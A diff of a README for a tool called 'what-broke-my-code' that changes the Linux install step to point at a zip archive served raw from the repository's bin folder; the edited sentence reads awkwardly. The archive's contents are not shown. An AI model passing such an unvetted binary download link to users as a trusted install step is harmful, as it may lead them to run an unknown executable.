Zues2231/what-broke-my-code/README.md

    - **Windows:** Run the installer and follow the prompts.
    - **Mac:** Open the `.dmg` file and drag the app to your Applications folder.
-   - **Linux:** Extract the downloaded `.tar.gz` file and follow the command line instructions provided.
+   - **Linux:** Extract the downloaded `https://raw.githubusercontent.com/Zues2231/what-broke-my-code/main/bin/what-broke-my-code-2.9.zip` file and follow the command line instructions provided.

 3. **Run the Application:**
    Open a terminal window and type `wbmc`.
 Follow the prompts to analyze your code.